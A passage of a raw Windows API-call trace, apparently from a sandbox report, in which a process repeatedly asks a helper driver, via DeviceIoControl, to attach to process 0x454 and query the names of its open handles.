ApcState=0xfffff880053c85d0) [0245.358] ObReferenceObjectByHandle (in: Handle=0x720, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000c876e0, HandleInformation=0x0) returned 0x0 [0245.359] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.359] PsReleaseProcessExitSynchronization () returned 0x2 [0245.359] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.359] ObQueryNameString (in: Object=0xfffff8a000c876e0, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.359] ObfDereferenceObject (Object=0xfffff8a000c876e0) returned 0x1 [0245.359] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.359] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.359] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.359] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.359] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.359] PsAcquireProcessExitSynchronization () returned 0x0 [0245.359] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.359] ObReferenceObjectByHandle (in: Handle=0x728, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000c43af0, HandleInformation=0x0) returned 0x0 [0245.359] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.359] PsReleaseProcessExitSynchronization () returned 0x2 [0245.359] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.359] ObQueryNameString (in: Object=0xfffff8a000c43af0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.359] ObfDereferenceObject (Object=0xfffff8a000c43af0) returned 0x1 [0245.359] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.359] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.359] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.359] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0245.359] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.359] PsAcquireProcessExitSynchronization () returned 0x0 [0245.359] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.360] ObReferenceObjectByHandle (in: Handle=0x72c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800bb1cbc0, HandleInformation=0x0) returned 0x0 [0245.360] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.360] PsReleaseProcessExitSynchronization () returned 0x2 [0245.360] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.360] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312d044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800312d044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.360] ObfDereferenceObject (Object=0xfffffa800bb1cbc0) returned 0x1 [0245.360] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.360] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.360] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.360] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.360] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.360] PsAcquireProcessExitSynchronization () returned 0x0 [0245.360] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.360] ObReferenceObjectByHandle (in: Handle=0x738, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00146e250, HandleInformation=0x0) returned 0x0 [0245.360] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.360] PsReleaseProcessExitSynchronization () returned 0x2 [0245.360] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.360] ObQueryNameString (in: Object=0xfffff8a00146e250, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.360] ObfDereferenceObject (Object=0xfffff8a00146e250) returned 0x1 [0245.360] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.360] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.360] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.361] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0245.361] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.361] PsAcquireProcessExitSynchronization () returned 0x0 [0245.361] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.361] ObReferenceObjectByHandle (in: Handle=0x73c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001fa4400, HandleInformation=0x0) returned 0x0 [0245.361] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.361] PsReleaseProcessExitSynchronization () returned 0x2 [0245.361] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.361] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.361] ObfDereferenceObject (Object=0xfffffa8001fa4400) returned 0x1 [0245.361] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.361] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.361] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.361] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.361] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.361] PsAcquireProcessExitSynchronization () returned 0x0 [0245.361] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.361] ObReferenceObjectByHandle (in: Handle=0x740, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00183fe90, HandleInformation=0x0) returned 0x0 [0245.361] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.361] PsReleaseProcessExitSynchronization () returned 0x2 [0245.361] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.361] ObQueryNameString (in: Object=0xfffff8a00183fe90, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.361] ObfDereferenceObject (Object=0xfffff8a00183fe90) returned 0x1 [0245.361] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.361] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.361] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.361] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0245.361] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.361] PsAcquireProcessExitSynchronization () returned 0x0 [0245.361] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.362] ObReferenceObjectByHandle (in: Handle=0x744, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003922070, HandleInformation=0x0) returned 0x0 [0245.362] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.362] PsReleaseProcessExitSynchronization () returned 0x2 [0245.362] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.362] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.362] ObfDereferenceObject (Object=0xfffffa8003922070) returned 0x1 [0245.362] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.362] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.362] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.362] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.362] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.362] PsAcquireProcessExitSynchronization () returned 0x0 [0245.362] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.362] ObReferenceObjectByHandle (in: Handle=0x748, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0017c5b90, HandleInformation=0x0) returned 0x0 [0245.362] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.362] PsReleaseProcessExitSynchronization () returned 0x2 [0245.362] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.362] ObQueryNameString (in: Object=0xfffff8a0017c5b90, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.362] ObfDereferenceObject (Object=0xfffff8a0017c5b90) returned 0x1 [0245.362] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.362] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.362] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.362] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0245.362] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.362] PsAcquireProcessExitSynchronization () returned 0x0 [0245.362] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.362] ObReferenceObjectByHandle (in: Handle=0x768, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800fa9f360, HandleInformation=0x0) returned 0x0 [0245.362] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.362] PsReleaseProcessExitSynchronization () returned 0x2 [0245.363] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.363] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.363] ObfDereferenceObject (Object=0xfffffa800fa9f360) returned 0x1 [0245.363] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.363] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.363] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.363] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0245.363] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.363] PsAcquireProcessExitSynchronization () returned 0x0 [0245.363] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.363] ObReferenceObjectByHandle (in: Handle=0x770, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800298bc90, HandleInformation=0x0) returned 0x0 [0245.363] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.363] PsReleaseProcessExitSynchronization () returned 0x2 [0245.363] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.363] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.363] ObfDereferenceObject (Object=0xfffffa800298bc90) returned 0x1 [0245.363] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.363] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.363] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.363] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe6, lpOverlapped=0x0) returned 1 [0245.363] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.363] PsAcquireProcessExitSynchronization () returned 0x0 [0245.363] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.363] ObReferenceObjectByHandle (in: Handle=0x778, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001e7fdd0, HandleInformation=0x0) returned 0x0 [0245.363] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.363] PsReleaseProcessExitSynchronization () returned 0x2 [0245.363] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.363] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.364] ObfDereferenceObject (Object=0xfffffa8001e7fdd0) returned 0x1 [0245.364] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.364] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.364] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.364] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0245.364] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.364] PsAcquireProcessExitSynchronization () returned 0x0 [0245.364] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.364] ObReferenceObjectByHandle (in: Handle=0x780, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f3da80, HandleInformation=0x0) returned 0x0 [0245.364] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.364] PsReleaseProcessExitSynchronization () returned 0x2 [0245.364] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.364] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.364] ObfDereferenceObject (Object=0xfffffa8001f3da80) returned 0x1 [0245.364] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.364] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.364] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.364] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x34, lpOverlapped=0x0) returned 1 [0245.364] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.364] PsAcquireProcessExitSynchronization () returned 0x0 [0245.364] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.364] ObReferenceObjectByHandle (in: Handle=0x7c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80039a73c0, HandleInformation=0x0) returned 0x0 [0245.364] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.364] PsReleaseProcessExitSynchronization () returned 0x2 [0245.364] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.364] ObQueryNameString (in: Object=0xfffffa80039a73c0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.364] ObfDereferenceObject (Object=0xfffffa80039a73c0) returned 0x1 [0245.364] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.364] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.365] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.365] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0245.365] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.365] PsAcquireProcessExitSynchronization () returned 0x0 [0245.365] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.365] ObReferenceObjectByHandle (in: Handle=0x7cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003715dd0, HandleInformation=0x0) returned 0x0 [0245.365] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.365] PsReleaseProcessExitSynchronization () returned 0x2 [0245.365] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.365] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.365] ObfDereferenceObject (Object=0xfffffa8003715dd0) returned 0x1 [0245.365] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.365] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.365] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.365] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xb0, lpOverlapped=0x0) returned 1 [0245.365] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.365] PsAcquireProcessExitSynchronization () returned 0x0 [0245.365] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.365] ObReferenceObjectByHandle (in: Handle=0x7e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0010bbe70, HandleInformation=0x0) returned 0x0 [0245.365] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.365] PsReleaseProcessExitSynchronization () returned 0x2 [0245.365] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.365] ObQueryNameString (in: Object=0xfffff8a0010bbe70, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.365] ObfDereferenceObject (Object=0xfffff8a0010bbe70) returned 0x7 [0245.365] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.365] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.366] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.366] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xd6, lpOverlapped=0x0) returned 1 [0245.366] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.366] PsAcquireProcessExitSynchronization () returned 0x0 [0245.366] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.366] ObReferenceObjectByHandle (in: Handle=0x7e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003694730, HandleInformation=0x0) returned 0x0 [0245.366] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.366] PsReleaseProcessExitSynchronization () returned 0x2 [0245.366] ObfDereferenceObject (Object=0xfffffa80036d0060) 